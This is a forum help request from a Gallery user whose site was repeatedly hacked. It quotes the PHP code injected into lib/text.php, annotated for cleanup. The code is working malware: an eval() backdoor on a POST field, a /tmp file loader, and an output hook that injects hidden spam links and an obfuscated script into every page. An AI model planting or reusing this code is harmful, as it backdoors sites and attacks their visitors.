Hacked?

visionary

Joined: 2008-09-01
Posts: 2
Posted: Mon, 2008-09-01 15:47

It seems I have been hacked. I updated to Gallery 1.5.8 and got hacked again. What should I do to prevent this?

Error:

Parse error: parse error, unexpected '<' in /hsphere/local/home/me/mysite.com/b/gallery/lib/text.php on line 77

In text.php, line 77:

...
<?php
// Injected code found in gallery/lib/text.php; annotated here for analysis and cleanup only.
// It does three things: (1) loads and runs attacker-supplied PHP, (2) rewrites every HTML
// response to carry a hidden block of spam links plus an obfuscated script, and (3) hooks the
// PHP error handler so that the rewrite hook is re-checked whenever an error fires.
// NOTE(review): presumably the parse error quoted in the post arises because this "<?php" tag
// was inserted at a point where the file was already in PHP mode; confirm against line 77.
// NOTE(review): the function_exists() guard below suggests the same snippet may sit in more
// than one file of the site; search the whole tree for the marker names 'tmp_lkojfghx',
// 'TMP_XHGFJOKL' and 'tmp_xhgfjokl', and restore affected files from a known-clean copy.
if(!function_exists('tmp_lkojfghx')){
// Second-stage loader: includes the first file that exists among /tmp/m1 .. /tmp/m99.
// Anything able to write to /tmp on the host can therefore run code inside this site.
for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}
// Backdoor: the POST field 'tmp_lkojfghx3' is passed straight to eval(), i.e. unauthenticated
// arbitrary PHP execution on every request that reaches an infected file. Requests carrying
// this field name are a useful thing to look for in web-server or WAF logs.
if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);
// Payload constant: the base64 decodes to a div positioned off-screen
// (position:absolute; left:-1000px; top:-1000px) holding pharma-spam links and a <script>
// that runs eval(unescape(...)) unless a 'yahoo_counter' variable is already numeric.
// The inner script is itself obfuscated; treat it as hostile to visitors' browsers.
if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PGRpdiBzdHlsZT0ncG9zaXRpb246YWJzb2x1dGU7IGxlZnQ6LTEwMDBweDsgdG9wOi0xMDAwcHg7Jz5FcmVjdGlsZSBkeXNmdW5jdGlvbiBleGVyY2lzZXMgPGEgaHJlZj1odHRwOi8vd3d3LmFuc3dlcmJhZy5jb20vcHJvZmlsZS8/aWQ9MzEwMTY4IFRJVExFPSdzZWFyY2ggYnV5IHZpYWdyYSc+YnV5IHZpYWdyYSBtYXN0ZXJjYXJkPC9BPjxicj4KRG9lcyB2aWFncmEgd29yayBmb3IgdGhlc2UgcGVvcGxlIHVzaW5nIDxhIGhyZWY9aHR0cDovL2ZvcnVtLmx5Y29zLmRlL21lbWJlci5waHA/dT0yNjI4MiBUSVRMRT0nYnV5IHZpYWdyYSBtYXN0ZXJjYXJkJz5idXkgdmlhZ3JhIGNoZWFwPC9BPi4gRnVubnkgdmlhZ3JhIHN0b3JpZXMgdGhlIGFuc3dlciBpcyBvbGQgbWFuIHdobyB0YWtlcyBWaWFncmEgZXZlcnlvbmUga25vd3MgdGhhdCA8YSBocmVmPWh0dHA6Ly93d3cueW91dHViZS5jb20vdHJheHRlbmJlcmc1NTUgVElUTEU9J2J1eSB2aWFncmEgdGVzdCcgdGFyZ2V0PV9ibGFuaz5idXkgdmlhZ3JhIHBpbGxzPC9BPgo8c2NyaXB0PmlmKHR5cGVvZih5YWhvb19jb3VudGVyKSE9dHlwZW9mKDEpKWV2YWwodW5lc2NhcGUoJz92ISU2MWByJTIwfiU2MSUyQ2BpLGAlNUY7JTYxQD0lNUJAJTIyMTk/MUAuPzEzJTMzPyIhLCIhJTMxNXwlMzd8JTJFQDIwJTMyIn4lMkN8ImAxNSUzOCUyRT84OSUyMiUyQz8iMWA5JCUzMUAuODR+ImBdO0AlNUYlM0QlMzF+JTNCaWYoJTY0b2N1JCU2RH5lbmB0YC5+JTYzbyMlNkYlNkIkJTY5JCU2NSUyRSU2RCU2MSU3NCU2M35oKCUyRmAlNUNAYj8lNjh8JTY3ZiU3NCUzRCMxLyMlMjklM0QkJTNEQG4hdSU2Q2wpIyU2NiFvcihAaSUzRCMlMzAlM0IlNjlgJTNDYDQ7YCU2OSslMkIpfCU2NHwlNkYhJTYzJTc1JTZEJTY1IyU2RSU3NH4uYCU3NyU3MiU2OWB0ZSUyOEAiYCUzQyQlNzMlNjNgciU2OSFwI3QlM0UkJTY5JTY2JTI4JTVGYCUyOSU2NCElNkZjJTc1fiU2RCMlNjUjJTZFJCU3NCUyRXwlNzchJTcyI2l0YCU2NSUyOHwlNUN+Ij8lM0NzYyQlNzIlNjklNzAjdHwgaWQlM0R+JTVGIn4lMkIkJTY5JCUyQiUyMiU1RiUyMD8lNzMlNzIhYyElM0R8Lz8lMkZAJTM3Ni4lMzEjJTM2IyUzMy5+JTIyK3xhPyU1QiU2OUAlNUQlMkIjIiElMkYlNjNwPyUyRiUzRSUzQyU1QyElNUMlMkZAcyU2MyElNzJgJTY5JTcwJTc0JTNFIyU1QyElMjIlMjklM0N+JTVDfC8lNzNjJCU3MiU2OUBwJTc0JTNFPyUyMik/JTNCJykucmVwbGFjZSgvYHxAfFx8fFw/fCN8XCR8fnxcIS9nLCIiKSk7dmFyIHlhaG9vX2NvdW50ZXI9MTs8L3NjcmlwdD48L2Rpdj4K'));
// Output-buffer callback: receives the finished page in $s and returns the tampered page.
function tmp_lkojfghx($s){
// $g records whether the buffer starts with the gzip magic bytes 1f8b; if so the 10-byte
// header and 8-byte trailer are cut off and the body is inflated so it can be edited.
if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));
// The base64 here decodes to a regex matching the off-screen div up to its closing tag;
// $s1 is the page with any earlier injection removed, so the block is not stacked twice.
$s1=preg_replace(base64_decode('IzxkaXYgc3R5bGU9J3Bvc2l0aW9uOmFic29sdXRlOyBsZWZ0Oi0xMDAwcHg7IHRvcDotMTAwMHB4Oyc+Lis/PC9kaXY+CiNz'),'',$s);
// Preferred placement: directly before the closing body tag. The str_replace escapes '$'
// in the payload so preg_replace does not read it as a back-reference.
if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);
// Fallback: append the payload when an old copy was stripped, when the constant
// 'PMT_knghjg' is defined (not defined anywhere in this snippet), or when the output
// contains an opening body tag or a closing title tag.
elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;
// Re-compress if the input was gzip so the response still matches its encoding.
return $g?gzencode($s):$s;}
// Installer, also registered as the PHP error handler (hence the four optional parameters).
// NOTE(review): it returns no value, so PHP's built-in error reporting is presumably
// bypassed while it is installed; confirm against the PHP version in use.
function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){
$s=array();
// When invoked with a non-empty second argument and a saved previous handler exists,
// forward the call to that handler so the site's own error handling keeps working.
if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);
// Walk the active output buffers: stop if the hook is already installed, otherwise
// remember each buffer's handler name (false for the default handler).
foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);
// Close the existing buffers from innermost to outermost, keeping their contents.
for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}
// Start the malicious buffer first so it becomes the outermost one and sees final output.
ob_start('tmp_lkojfghx');
// Re-open the original buffers in order and replay their saved contents into them.
for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}
}
}
// Register the installer as the error handler; set_error_handler's return value (the
// previous handler) is saved in $GLOBALS['tmp_xhgfjokl'] unless it is this same function.
if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;
// Install the output hook immediately for the current request.
tmp_lkojfghx2(); ?>
...